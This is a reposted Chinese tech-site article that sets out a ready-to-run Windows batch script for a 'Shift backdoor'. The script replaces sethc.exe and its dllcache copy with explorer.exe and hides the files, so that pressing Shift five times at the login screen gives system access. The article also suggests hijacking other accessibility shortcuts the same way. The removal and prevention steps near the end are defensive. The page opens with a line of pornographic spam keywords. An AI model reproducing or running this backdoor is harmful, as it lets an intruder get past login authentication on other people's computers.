人妖在线一区,国产日韩欧美一区二区综合在线,国产啪精品视频网站免费,欧美内射深插日本少妇

新聞動態(tài)

shift后門批處理代碼與shift后門清除方法分享

發(fā)布日期:2021-12-25 07:13 | 文章來源:腳本之家
在cmd下輸入以下命令...
下面再打開記事本把底下的代碼粘貼進(jìn)去。

復(fù)制代碼
代碼如下:

@echo off
cls
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
echo.
echo Shift后門
echo.sproink
@copy c:\windows\explorer.exe c:\windows\system32\sethc.exe
@copy c:\windows\system32\sethc.exe c:\windows\system32\dllcache\sethc.exe
@attrib c:\windows\system32\sethc.exe +h
@attrib c:\windows\system32\dllcache\sethc.exe +h
echo 使用方法:本文件執(zhí)行完畢后,
echo 在終端界面按Shift 5次即可登陸系統(tǒng)!
echo.
copy c:\windows\explorer.exe c:\windows\system32\sethc.exe
echo 完成百分之 50
copy c:\windows\system32\sethc.exe c:\windows\system32\dllcache\sethc.exe
echo 完成百分之 80
attrib c:\windows\system32\sethc.exe +h
echo 完成百分之 90
attrib c:\windows\system32\dllcache\sethc.exe +h
echo 完成百分之 100
cls
echo.
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
echo 后門安裝完畢!
echo.
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
echo.
echo. & pause
exit

其實(shí)原理很簡單,就是利用了explorer.exe 這個資源管理器進(jìn)程替換調(diào)用的shift 默認(rèn)啟動程序,然后還覆蓋了windows的文件保護(hù)原文件(防止文件保護(hù)系統(tǒng)檢測到文件修改,會還原這些原來的程序,造成copy文件失去作用),當(dāng)調(diào)用shift是其實(shí)調(diào)用的真正程序是桌面進(jìn)程。Lyon: 同理,你也可以利用此方法替換屏幕鍵盤及放大鏡和組合鍵:win+u,其它自己可以拓展思路^_^
下面介紹如何清除此后門...
打開控制面板--輔助功能選項(xiàng)--粘滯鍵--設(shè)置--去掉使用快捷鍵的勾

還有要改下copy.exe的權(quán)限,不過在這里推薦大家把c盤所有的程序都 改下,只有administrator才能訪問

shift后門的預(yù)防解決辦法:預(yù)防很簡單的,連敲5次shift,然后在彈出的設(shè)置里面取消連滯鍵
已經(jīng)中了的話
attrib c:\windows\system32\sethc.exe -h
attrib c:\windows\system32\dllcache\sethc.exe -h
拷貝新的 c:\windows\system32\sethc.exe 文件到 c:\windows\system32\目錄下;拷貝新的c:\windows\system32\dllcache\sethc.exe到c:\windows\system32\dllcache\目錄下
還有就是在c:\windows\system32及c:\windows\system32\dllcache\下找到sethc.exe 禁止所有用戶權(quán)限或拒絕訪問等,也可:)建議利用前者恢復(fù)。。。
收工!

版權(quán)聲明:本站文章來源標(biāo)注為YINGSOO的內(nèi)容版權(quán)均為本站所有,歡迎引用、轉(zhuǎn)載,請保持原文完整并注明來源及原文鏈接。禁止復(fù)制或仿造本網(wǎng)站,禁止在非www.sddonglingsh.com所屬的服務(wù)器上建立鏡像,否則將依法追究法律責(zé)任。本站部分內(nèi)容來源于網(wǎng)友推薦、互聯(lián)網(wǎng)收集整理而來,僅供學(xué)習(xí)參考,不代表本站立場,如有內(nèi)容涉嫌侵權(quán),請聯(lián)系alex-e#qq.com處理。

相關(guān)文章

實(shí)時開通

自選配置、實(shí)時開通

免備案

全球線路精選!

全天候客戶服務(wù)

7x24全年不間斷在線

專屬顧問服務(wù)

1對1客戶咨詢顧問

在線
客服

在線客服:7*24小時在線

客服
熱線

400-630-3752
7*24小時客服服務(wù)熱線

關(guān)注
微信

關(guān)注官方微信
頂部